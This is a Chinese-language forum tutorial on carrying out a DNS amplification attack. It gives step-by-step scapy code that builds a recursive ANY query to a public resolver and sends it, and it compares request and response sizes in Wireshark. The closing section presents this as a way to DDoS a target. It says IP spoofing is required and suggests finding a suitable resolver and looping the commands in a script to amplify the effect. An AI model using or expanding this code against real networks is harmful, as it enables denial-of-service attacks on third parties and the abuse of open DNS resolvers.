本文来自i春秋作者： 即刻安全

前言：

今天为大家介绍DNS放大攻击。通过DNS服务器的递归查询，我们可以利用少量的查询流量，来获得大量的返回数据流量。该攻击方式需要结合IP地址伪造，同时需要DNS服务器支持递归查询。下面我们来看看，如何实现攻击？

0x00

首先，我们用 scapy 来构造一个完整的DNS查询数据包。

i=IP()
i.display()

0x01

修改目标DNS地址。

i.dst="8.8.8.8"

i.display()

0x02

定义UDP包。

u=UDP()
u.display()

0x03

定义DNS包。

d=DNS()
d.rd=1
d.qdcount=1
d.display()

0x04

设置DNS查询内容。

q=DNSQR()
q.qname="xxxxx.com"
q.qtype=255
q.display()

0x05

d.qd=q (把查询内容赋给DNS的qd)
r=(i/u/d)
d.display()

0x06

最后我们来发送我们构建的数据包。

sr1(r)

0x07

我们打开 wireshark 来进行抓包。

后序：

通过 wireshark 的抓包我们可以看到，我们查询时发送的数据包为 68 字节，但响应包为118字节。这样就实现了，通过返回的大流量来达到对目标服务器的DDoS效果！当然这里返回的流量还不够巨大，原因在于DNS服务器做了一定的限制。只要找到合适的DNS服务器，并将以上命令写入脚本中循环执行，那么效果将更加明显！下面是我们即刻安全的微信公众号，欢迎大家关注！！

原文地址：http://bbs.ichunqiu.com/thread-12685-1-1.html?from=paper